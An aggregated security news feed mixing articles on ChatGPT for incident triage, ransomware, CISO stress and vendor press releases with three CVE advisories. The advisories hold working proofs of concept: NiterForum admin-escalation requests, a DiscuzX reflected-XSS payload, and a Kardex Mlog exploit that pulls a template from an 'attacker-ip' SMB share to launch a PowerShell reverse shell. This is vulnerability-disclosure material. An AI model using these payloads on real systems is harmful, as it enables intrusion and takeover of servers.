Incident response triage and software vulnerability discovery are two areas where the large language model has demonstrated success, although false positives are common.

A number of experiments suggest that ChatGPT, the popular large language model (LLM), could be useful to help defenders triage potential security incidents and find security vulnerabilities in code, even though the artificial intelligence (AI) model was not specifically trained for such activities, according to results released this week.

In a Feb. 15 analysis of ChatGPT's utility as an incident response tool, Victor Sergeev, incident response team lead at Kaspersky, found that ChatGPT could identify malicious processes running on compromised systems. Sergeev infected a system with the Meterpreter and PowerShell Empire agents, took common steps in the role of an adversary, and then ran a ChatGPT-powered scanner against the system.

The LLM identified two malicious processes running on the system, and correctly ignored 137 benign processes, potentially reducing overhead to a significant degree, he wrote in a blog post describing the experiment.

"ChatGPT successfully identified suspicious service installations, without false positives," Sergeev wrote. "For the second service, it provided a conclusion about why the service should be classified as an indicator of compromise."

Security researchers and AI hackers have all taken an interest in ChatGPT, probing the LLM for weaknesses, while other researchers, as well as cybercriminals, have attempted to lure the LLM to the dark side, setting it to produce better phishing emails messages or generate malware.

    

ChatGPT found indicators of compromise with some false positives. Source: Kaspersky

Yet security researchers are also looking at how the generalized language model performs on specific defense-related tasks. In December, digital forensics firm Cado Security used ChatGPT to create a timeline of a compromise using JSON data from an incident, which produced a good — but not totally accurate — report. Security consultancy NCC Group experimented with ChatGPT as a way to find vulnerabilities in code, which it did, but not always accurately.

The conclusion is that security analysts, developers, and reverse engineers need to take care whenever using LLMs, especially for tasks outside the scope of their capabilities, says Chris Anley, chief scientist at security consultancy NCC Group.

"I definitely think that professional developers, and other folks who work with code should explore ChatGPT and similar models, but more for inspiration than for absolutely correct, factual results," he says, adding that "security code review isn't something we should be using ChatGPT for, so it's kind of unfair to expect it to be perfect first time out."

**Analyzing IoCs With AI**

The Kaspersky experiment started with asking ChatGPT about several hackers' tools, such as Mimikatz and Fast Reverse Proxy. The AI model successfully described those tools, but when requested to identify well-known hashes and domains, it failed. The LLM could not identify a well-known hash of the WannaCry malware, for example.

The relative success of identifying malicious code on the host, however, led Kasperky's Sergeev to ask ChatGPT to create a PowerShell script to collect metadata and indicators of compromise from a system and submit them to the LLM. After improving the code manually, Sergeev used the script on the infected test system.

Overall, the Kaspersky analyst used ChatGPT to analyze the metadata for more than 3,500 events on the test system, finding 74 potential indicators of compromise, 17 of which were false positives. The experiment suggests that ChatGPT could be useful for collecting forensics information for companies that are not running an endpoint detection and response (EDR) system, detecting code obfuscation, or reverse engineering code binaries.

Sergeev also warned that inaccuracies are a very real problem. "Beware of false positives and false negatives that this can produce," he wrote. "At the end of the day, this is just another statistical neural network prone to producing unexpected results."

In its analysis, Cado Security warned that ChatGPT typically does not qualify the confidence of its results. "This is a common concern with ChatGPT that OpenAI \[has\] raised themselves — it can hallucinate, and when it does hallucinate, it does so with confidence," Cado's analysis stated.

**Fair Use and Privacy Rules Need Clarifying**

The experiments also raise some critical issues regarding the data submitted to OpenAI's ChatGPT system. Already, companies have started taking exception to the creation of datasets using information on the Internet, with companies such as Clearview AI and Stability AI facing lawsuits seeking to curtail their use of their machine learning models.

Privacy is another issue. Security professionals have to determine whether submitted indicators of compromise expose sensitive data, or if submitting software code for analysis violates a company's intellectual property, says NCC Group's Anley.

"Whether it's a good idea to submit code to ChatGPT depends a lot on the circumstances," he says. "A lot of code is proprietary and is under various legal protections, so I wouldn't recommend that people submit code to third parties unless they have permission to do so."

Sergeev issued a similar warning: Using ChatGPT to detect compromise sends sensitive data to the system by necessity, which could be a violation of company policy and may present a business risk.

"By using these scripts, you send data, including sensitive data, to OpenAI," he stated, "so be careful and consult the system owner beforehand."

ChatGPT Subs In as Security Analyst, Hallucinates Only Occasionally

An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.

**Vulnerability Details****Any registered user**

code:  
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83：

    @ResponseBody//@ResponseBody返回json格式的数据
    @RequestMapping(value = "/register", method = RequestMethod.POST)
    public Object register(HttpServletRequest request,
                        @RequestParam("name") String name,
                        @RequestParam("password") String password,
                        @RequestParam("type") Integer type,
                        HttpServletResponse response) {
        //1为手机号，2为邮箱号
        ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password);
        if(200\==resultDTO.getCode()){
            Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400\*3);
            response.addCookie(cookie);
        }
        return resultDTO;
    }

Any user can add users through this interface  

return：  
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}  
query database，successfully added：  

**Add administrator without authority**

at  
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136：

    @PostMapping("/user2588/setAdmin/id")
    @ResponseBody
    public Map<String,Object\> setQuestionById(HttpServletRequest request,
                                              @RequestParam(name = "id",defaultValue = "0") Long id) {

        UserDTO user = (UserDTO)request.getAttribute("loginUser");
        //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
        if (user == null) {
            throw new CustomizeException(CustomizeErrorCode.NO\_LOGIN);
        }
        Map<String,Object\> map  = new HashMap<>();
        UserAccount userAccount = new UserAccount();
        userAccount.setGroupId(19);
        UserAccountExample userAccountExample = new UserAccountExample();
        userAccountExample.createCriteria().andUserIdEqualTo(id);
        if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){
            map.put("code",200);
            map.put("message","恭喜您，设置成功！");
        }
        return map;

    }
}

This interface does not perform permission verification, and any user can access it after logging in.  

**POC:****Any registered user**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

**Add administrator without authority**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

CVE-2022-38935: There is a vulnerability that can add the administrator account · Issue #25 · yourkevin/NiterForum

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.

Product: Kardex Mlog MCC  
Vendor: Kardex Holding AG  
Tested Version: 5.7.12+0-a203c2a213-master  
Fixed Version: inline patch - no new version number  
Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C (Score 8.3)  
CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Score 9.6)  
Solution Status: fixed Manufacturer Notification: 2022-12-13  
Solution Date: 2023-01-24  
Public Disclosure: 2023-02-07  
CVE Reference: CVE-2023-22855  
Authors of Advisory: Patrick Hener & Nico Viakowski

**Overview\[1\]**

> Kardex Mlog’s modular software solution Kardex Control Center manages material flow and warehouse management processes faster and more efficiently.

> From manual block warehouse and interface networking with intelligent partner systems to an automated intralogistics system connected to production lines and driverless vehicles, intelligent energy management for the automated stacker cranes and modern system visualization, the Kardex Control Center modules offer flexible solutions for your warehouse management.

**Vulnerability Details**

The .NET based software spawns a web interface listening on port 8088. This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function (Path.Combine) without proper sanitization. This yields the possibility to include local files, as well as remote files (SMB). The path is used in a function called getFile.

The following code snippet shows the vulnerable part of this function:

public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString \= null)
		{
			MccHttpServerResult result4;

\[... snip ...\]

else
	{
		string getfileName \= (path \== "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));
		string fileName \= Path.Combine(this.RootDirectory(), getfileName);
		string originalFileName \= fileName;

The .Net function Path.Combine also is able to concatenate remote targets. For example using \\ipaddress you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of the file retrieved.

Depending on the MIME type the content is either sent through a import/export procedure or rendered as mono/t4 template. The function getMimeType will return t4 if the included file is ending with an extension of .t4.

This is where the File Inclusion can be escalated to a Remote Code Execution. The mono/t4 templating engine allows the use of C# to evaluate code. This enables an attacker to gain code execution and eventually spawn a reverse shell.

bool flag15 \= File.Exists(fileName);
	if (flag15)
		{
			using (FileStream f \= new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
			{
				byte\[\] bytes \= new byte\[f.Length\];
				f.Read(bytes, 0, bytes.Length);
				bool flag16 \= mime2 \== "t4";
				if (flag16)
					{
						return this.runTemplatingEngine(bytes, responseHeaders, queryString);
					}

**Proof of Concept (PoC)**

The following request will include a remote file from an smb share. For this to work the attacker has to spawn an smb server (for example using smbserver.py from Impacket\[2\]).

    GET /\\attacker-ip/share/exploit.t4 HTTP/1.1
    Host: vulnearble.host.internal:8088
    Content-Type: text/html
    User-Agent: curl/7.86.0
    Accept: */*
    Connection: close
    

The exploit.t4 looks like this:

<#@ template language="C#" #\>
<#@ Import Namespace="System" #\>
<#@ Import Namespace="System.Diagnostics" #\>

Proof of Concept - SSTI to RCE
RCE running ...

<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\\Windows\\System32";
proc1.FileName = @"C:\\Windows\\System32\\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#\>

Enjoy your shell, good sir :D

The exploit above will execute cmd.exe and launch a powershell to execute a reverse shell. You can easily generate a reverse shell blob using revshells.com\[3\].

A full exploit spawning a reverse shell was created\[4\].

**Solution**

The user supplied data should be sanitized before using it in the Path.Combine function.

**Disclosure Timeline**

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

**References**

\[1\] Vendor Website: https://www.kardex.com/en/mlog-control-center  
\[2\] Impacket Git Repository: https://github.com/SecureAuthCorp/impacket  
\[3\] Reverse Shell Generator: https://www.revshells.com/  
\[4\] Exploit on Exploit-DB (tbd): https://www.exploit-db.com/exploits/xxxxx  
\[5\] Blog Post Advisory: https://hesec.de/posts/CVE-2023-22855  
\[6\] Personal Github Repo for Advisory: https://github.com/patrickhener/CVE-2023-22855  
\[7\] Blog Post Thinking Objects: https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855

**Credits**

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail: patrickhener@posteo.de  
E-Mail: n.viakowski@pm.me

**Disclaimer**

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

CVE-2023-22855: CVE-2023-22855/advisory.md at main · patrickhener/CVE-2023-22855

By Habiba Rashid
Hackers are deploying the MortalKombat ransomware and Laplas Clipper malware in a financially motivated campaign against victims worldwide.
This is a post from HackRead.com Read the original post: New MortalKombat Ransomware Attack Aiming for Crypto Wallets

The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

Cisco’s Talos cybersecurity team has been tracking an unidentified threat actor behind a ransomware campaign that uses a variant of the Xorist commodity ransomware MortalKombat, as well as a GO variant of the **Laplas Clipper malware**.

The detailed advisory by Talos states that, once a computer is infected, it displays a Mortal Kombat 11 wallpaper along with a note instructing the victim to contact the attackers using **qTox**. For your information, qTox is an instant messaging app that is available for download via GitHub.

The email claims that the user’s payment has timed out and carries an attachment, which contains the malicious payload in a zipped file with a name that appears to be a CoinPayments transaction number.

Upon opening the attachment, a **multi-stage attack chain** is initiated, during which the actor delivers either malware or ransomware. The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

In case the email attachment drops Laplas Clipper alternatively, the victim’s **cryptocurrency wallet is targeted**. The malware monitors the computer’s clipboard for cryptocurrency wallet addresses.

If one is found, it is sent to the attacker’s server, where a Clipper bot creates a lookalike address owned by the hacker and then replaces the clipboard entry. This, according to Cisco Talos’ **blog post**, allows the threat actors to receive the funds that the user attempts to transfer into their own wallet.

> “The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers.”
> 
> _Cisco Talos Intelligence Group_

The campaign has reportedly been targeting individuals, small businesses, and large corporations alike in the United States, England, Turkey, and the Philippines.

The best way to protect yourself from being affected by **similar ransomware campaigns** is to be wary of suspicious emails from services you use. Until you ensure that the email you received is from a legitimate entity, it is highly advised that you do not click on any attachments.

Keeping the nature of this ransomware campaign in mind, Cisco Talos also encouraged companies to remain vigilant when performing cryptocurrency transactions.

1.  **Ransomware asks users to play Click Me game**
2.  **Ransomware tells users to play Japanese game**
3.  **New ransomware asks victims to play PUBG game**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

New MortalKombat Ransomware Attack Aiming for Crypto Wallets

Retail & Hospitality ISAC invites industry leaders, experts, and innovators to submit proposals for presentations and panel discussions.

**Vienna, VA (February 15, 2023)** **–** The Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC) is now accepting speaker submissions for the 2023 RH-ISAC Cyber Intelligence Summit. The event, which is the premier conference for retail and hospitality cybersecurity professionals, will bring together experts from across the industry to discuss the latest threats and solutions in the field.

The conference will focus on the challenges facing the retail and hospitality industries in the face of an ever-increasing number of cyber threats, and it will provide a platform for attendees to learn from the best and brightest in the field.

RH-ISAC invites industry leaders, experts, and innovators to submit proposals for presentations and panel discussions that cover topics such as threat intelligence, incident response, risk management, and security operations. The goal of the RH-ISAC Summit is to provide attendees with actionable insights, practical solutions, and meaningful connections that can help them better protect their organizations and customers from cyber threats.

“We’re thrilled to once again bring together the brightest minds in retail and hospitality cybersecurity for our annual summit,” said RH-ISAC President Suzie Squier. “The call for speakers is a critical component of the event, and we’re excited to hear from experts who can share their knowledge and experiences with our community.”

The RH-ISAC Cyber Intelligence Summit will take place October 2–4 in Dallas, Texas. To submit a speaker proposal, visit https://rhisac.org/events/call-for-presentations/. The deadline for submissions is May 5.

For more information about the RH-ISAC Cyber Intelligence Summit, visit https://summit.rhisac.org/.

**ABOUT RH-ISAC**

The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) is the sector’s operational community for sector-specific cybersecurity information and intelligence sharing and collaboration. As such, the RH-ISAC not only connects and serves its members,italso seeks to partner collaboratively with all trade associations in the sector to support security development and maturity with the goal of building better security for the retail, hospitality, and travel industries through partnership and collaboration. For more information, visit www.rhisac.org.

Call for Speakers Now Open for the RH-ISAC Cyber Intelligence Summit

Information security is a high-stakes field with sky-high expectations. Here's how CISOs can offset the pressures and stay healthy.

John has built a stellar reputation as a problem solver and cyber defender. Yet, today, John, the chief information security officer of a major manufacturing company, is frantically trying to find out why the CEO had been unable to retrieve or send any emails for the past four hours. The CEO is extremely irate, and as John takes in the barrage of anger, John begins to feel fear sinking into his chest. Would this incident tarnish his hard-earned reputation? Will he lose his job?

John prides himself on having answers and receiving praise for fixing problems, so he is taking this situation to heart. He started his IT security career as an analyst. He was incredibly talented at spotting gaps in security posture and determining creative ways to close those gaps. John's intelligence and innovation helped him quickly climb the ranks to CISO. However, each level of promotion brought with it increasing challenges and demands.

As an analyst, John's responsibility was confined to himself and his specific role. The CISO role has widened John's scope of responsibility immensely. He now has to manage a team of people with varying personalities; budget and request funds for projects; communicate and build relationships with other business leaders within his company; negotiate and buy products and services from vendors; and meet a number of other responsibilities. John also has to find time to be a husband, to be a father, and to take care of his own physical and mental health.

It doesn't help that John's leadership expects the IT security department to protect 100% against malicious threats targeting their company. John and his team are expected to perform perfectly. It's an unrealistic and unreasonable expectation, which leads to high stress and burnout. Unfortunately, many are in this position.

**What Leaders Should Do**

Had there been someone coaching John, he would have been taught about effective leadership traits that would help him have less emotional fallout in this scenario. There are three core tactics John could use to keep from questioning his own efficacy or suffering burnout.

**1\. See mistakes as a learning opportunity.** Mistakes happen. They are a part of life. Those who thrive see mistakes as learning opportunities and ways to get better. Accept any mistake as what it is: an outcome you did not want. Investigate what led to that outcome, determine what alternative choices were available, and understand what better option exists moving forward.

**2\. Control the controllables.** There are not a lot of things in our control. For example, we have no control over how others respond (like a yelling CEO), if a salesperson gives us all the information we need to make an educated purchase, if employees leave the company, if it's going to rain, or a litany of other things. Focusing on things outside of our control will lead to increased fear and manifesting more of what we do not want.

However, we do have the ability to focus on what we have control over. We have control over how we respond to situations; we have control over our energy, effort, and attitude; and we have control over how we choose to model for others. Focusing on what we control will not guarantee things work out. However, it will allow us to have more sanity and certainty we are doing the right things at the right time, which will increase our chances of success.

**3\. Remain calm.** When threats to our safety (real or perceived) occur, we instinctively go into survival mode — fight, flight, or freeze. In times of fear and panic, our cortex disconnects from the cerebellum, known in psychology as a "flipped lid." We lose our ability to critically think and problem-solve. Our breathing also becomes faster and shorter. You can get back to calm through your breath.

Box breathing is a simple and effective technique for recovering a mental space in which you can problem-solve. It employs four equal parts, just like the sides of a box. You inhale for 5 seconds, hold at the top of that breath for 5 seconds, exhale for 5 seconds, and hold at the bottom of that exhale for 5 seconds. Repeat this process for a minimum of 5 rounds or more.

**Reduce Stress to Reduce Turnover**

Stress is on the rise within the IT security space, which leads to problems like burnout and employee turnover. The 2022 Global Chief Information Security Officer (CISO) Survey from management consulting firm Heidrick & Struggles shows some concerning statistics. The survey showed stress (60%) and burnout (53%) were the top responses as being the most significant personal risks to CISOs in the United States.

People are leaving CISO roles for other operational positions, pursuing consulting opportunities, or not entering the CISO roles altogether. This exacerbates two big issues in the industry: not enough talent to fill seats and employee retention.

"They're \[CISOs\] choosing to punch out," Matt Aiello, partner and leader of the cyber practice at Heidrick & Struggles, told CNBC recently. "What we're hearing in off-line conversations is that it's a great role, but it's very hard and the regulatory pressures are increasing, and that makes being a CISO even more challenging."

Awareness and prioritization of mental health support and performance coaching is growing in this industry. In 2018, for example, the Black Hat conferences introduced a community track focused on mental health and other nontechnical topics that's continued to this day.

Being an IT security leader is hard. There are so many challenges to being effective in the role — unrealistic expectations of protecting your organization 100%, not getting the funding you need to purchase resources, difficulties finding and retaining good talent, etc. Ineffective leadership skills make this job harder. You and your team can thrive if you learn how to lead effectively and avoid burnout.

3 Ways CISOs Can Lead Effectively and Avoid Burnout

CISOs need to define their risk tolerance, identify specific critical data, and make changes based on strategic business goals.

The past few years have been a bumpy ride all around. 2022 was supposed to be a breather for CISOs as the uncertainty surrounding the pandemic largely subsided. Sadly, they found themselves coming to terms with the new "never normal" instead.

A soaring cost of living, geopolitical conflicts, catastrophic climate crisis, and a rapidly evolving regulatory environment all will shape the cybersecurity landscape this year. Newer threats have emerged and older ones have evolved. Critical infrastructure, public service delivery, and people's privacy all seem to be in the line of fire. And with ongoing digital transformation initiatives, exponential data growth, limited funds, and an ongoing skills shortage, CISOs and their teams, it seems, are barely holding it together.

**Waypoints on Path to Action**

Keeping up with emerging threats and challenges in 2023 can help organizations get on the path to developing a coherent security strategy.

**1\. Cyberattacks increase, tactics evolve:** Ransomware incidents dropped by 34% earlier in 2022, only to roar back with a vengeance. Ransomware has evolved to double and triple extortion with data theft and denial of service. We'll see an uptick in stolen data being sold on Dark Web forums and later being used in highly targeted phishing attacks.

The underground cybercrime landscape is also shifting from cybercrime-as-a-service to cyber mercenaries for hire. Expect cybercriminals and nation-state actors to hire highly skilled cyber mercenaries for granular tasks that can lead to major attacks and breaches. These attacks will be very impactful but near impossible to trace.

**2\. Supply chain risks balloon:** Supply chain security risks quickly bleed into the business side of operations, often bringing them to a halt. These risks will likely balloon this year as businesses outsource the infrastructure, applications, and services they need to multiple cloud and software-as-a-service (SaaS) vendors. With so many external providers and partners, attackers will target the most vulnerable ones to gain easy access.

**3\. Data-well poisoning attacks emerge:** Artificial intelligence-powered systems depend on the integrity of the data they're fed to make sound decisions. As businesses get real with AI in 2023, data will become an invaluable asset as well as a liability. Cybercriminals will be targeting data wells to manipulate systems into making rogue decisions. Beyond confidentiality and availability, data integrity is now at risk.

**4\. Tech, threat, and regulatory environments continually change:** Threats are evolving, and so is the regulatory landscape. General and country-specific regulations will compel organizations to ensure ethical data collection, storage, and use. These changes will likely keep CISOs on their toes, trying to preserve all the good pieces of the security pie while also ensuring enough flexibility to accommodate new changes.

**Creating a Business-Based Security Strategy**

Here's what organizations in general need to focus on to create a security strategy that can steer them through what appears will be a challenging year for security, economy, and trade.

**1\. Aligning security with business strategy:** CISOs are responsible for assuring business executives that cybersecurity is a business risk, not just an IT issue. As boards determine a business's strategic direction, CISOs must incorporate security into that process. To do that, addressing cyber-risks should frequently be on the agenda for board meetings.

A CISO who appreciates the business tactic of developing a security strategy that supports the organization's goals probably won't have to chase after the board for security funds and resources.

**2\. Building cyber resiliency:** Cyber resiliency is an organization's preparedness to deal with the impact of threats that can't be predicted or prevented. The first step to achieving cyber resilience is to adopt a governance framework for monitoring cyber activities, including partner collaborations and relevant regulatory changes. Organizations must also develop cyber situational awareness through cyber threat intelligence gathering, analysis, and sharing.

Next, they should identify and prioritize critical assets and continually evaluate them as their value changes. Based on the insights they gather, they need to plan and rehearse for just-in-case scenarios. Rehearsed incident-response plans can cut down the cost of a data breach almost by half.

Building cyber resilience is an ongoing process because threats evolve, businesses mature, and the value of different assets changes. Keeping up with the process, organizations can prevent, detect, and respond to emerging threats and their aftermath immediately and effectively.

**3\. Determining cyber-risk tolerance:** Organizations need to determine and define their risk tolerance regarding cyber-loss incidents. And that involves evaluating the dependencies, stability, and security of external partners and providers as well. Monitoring and protecting assets and data is not about boiling the ocean. It's about starting small, being very specific in identifying critical data elements, and then ensuring their security and integrity at all stages of the data life cycle.

A similar, selective approach should work for addressing changes in regulatory and compliance requirements, too. Organizations don't have the time or resources to do it all. They must identify what matters and make changes selectively based on their strategic business goals.

Addressing cyber-risks isn't a static process. Security teams know it, and the boards must realize it. The world of work is changing, and policies and procedures will have to reflect that. This rapidly evolving work and security environment can cause cyber fatigue and mental health challenges. Organizations must prioritize employees' education, satisfaction, and mental health. Otherwise, we'll also be witnessing a surge in insider threats on top of everything else.

Build Cyber Resiliency With These Security Threat-Mitigation Considerations

**COMMERCE, Mich.****,** **Feb. 15, 2023** **/PRNewswire/ --** Nuspire, a leading managed security services provider (MSSP), today announced the release of its Q4 and Year in Review 2022 Threat Report. The quarterly report provides a comprehensive analysis of the threat landscape, parsing malware, botnet and exploit data as well as breaking down the tactics, techniques and procedures (TTPs) favored by cybercriminals.

Nuspire's latest report validates the presumption that 2022 yielded the most threat activity in history. While Q4 saw dips across all three sectors Nuspire monitors, including malware, botnets and exploits, the net sum for the year shows a marked increase, especially in the case of exploits, which nearly doubled.

"We saw some normal ebbs in threat activity over the year, but the surges were stunning, delivering a volume of attacks we've never seen before," said J.R. Cunningham, Chief Security Officer at Nuspire. "While many of the methods focused on securing quick wins, like phishing and exploiting unpatched vulnerabilities, we also saw a rise in more coordinated threat group attacks on large organizations and critical infrastructure. Expect 2023 to have more of this activity, as well as adversaries' increased attention toward attacking consumer IoT devices."

Notable findings from Nuspire's quarterly report include:

*   Exploit activity grew by 105% in Q4 2022, with total 2022 exploits nearly doubling over 2021. Brute forcing was the most popular tactic, increasing by nearly 400% over Q3 2022.
*   Malware jumped nearly 35% in Q4, with its year-over-year increase reaching 6.85%. Nuspire attributes this relatively smaller increase to the positive effects of Microsoft's decision to block Visual Basic for Applications (VBA) macros by default for Office files. 
*   Botnets jumped by 30% in 2022, with banking trojan Torpig Mebroot comprising more than 40% of all botnet activity throughout the year.   

"If 2022 showed us anything, it's that threat actors are not only increasingly adept at finding ways to circumnavigate established cybersecurity defenses, but also, they bring a level of agility that lets them quickly course correct when a vector loses viability," said Craig Robinson, Research VP for Security Services at IDC. "We've seen the emergence of new security technologies aimed at thwarting a more creative and sophisticated adversary population, but no specific technology can replace the value of targeted threat intelligence to understand what's out there, how they're doing it and what you can do to protect yourself."

Access Nuspire's Q4 and Year in Review 2022 Threat Report to view the data and learn key mitigation strategies for protecting your organization's environment.

**About Nuspire** 

_Nuspire is a managed security services provider (MSSP), offering managed security services (MSS), managed detection and response (MDR), endpoint detection and response (EDR) that supports best in breed EDR solutions, and cybersecurity consulting services (CSC) that includes incident readiness and response, threat modeling, digital forensics, technology optimization, posture assessments and more. Our self-service, technology-agnostic platform, myNuspire, allows greater visibility into your entire security program. Powered by the self-healing always on Nuspire Cyber X Platform (CXP), myNuspire will help CISOs alleviate the pain associated with tech sprawl, provide intelligence driven recommendations, solve for alert fatigue and help their clients become more secure over time. Our deep bench of cybersecurity experts, award-winning threat intelligence and three 24×7 security operations centers (SOCs) detect, respond, and remediate advanced cyber threats. Our client base spans thousands of enterprises from midsized to large enterprises that span across multiple industries and geographic footprints. For more information, visit_ www.nuspire.com _and follow us at on LinkedIn @Nuspire._

SOURCE Nuspire

Report Reveals Record-Breaking Year for Cyber Threats

**KANSAS CITY, Missouri, and MIAMI (****S4X23****) —**  In an effort to improve cybersecurity resiliency for critical infrastructure environments, 1898 & Co. is launching Managed Threat Protection & Response, a new proactive threat hunting and response capability to its existing Managed Security Services (MSS) solution. 1898 & Co. is the business, technology and cybersecurity consulting arm of Burns & McDonnell, a 100% employee-owned engineering, construction and architecture firm.

Since the beginning of 2020, cyberattacks aimed at sectors that are critical to society have increased by more than 400%. Of those attacks, 45% were ransomware attacks that targeted or impacted industrial control systems. Left undetected, cyber sabotage within critical infrastructure environments like the power grid and water systems result in service disruptions, infrastructure damage and negative impacts to the environment and to public health and safety.

Unlike other firms that focus mostly on information technology cybersecurity, 1898 & Co. is one of the first firms to apply their operational technology (OT) and industrial control systems (ICS) cybersecurity specialization into managed security services.  

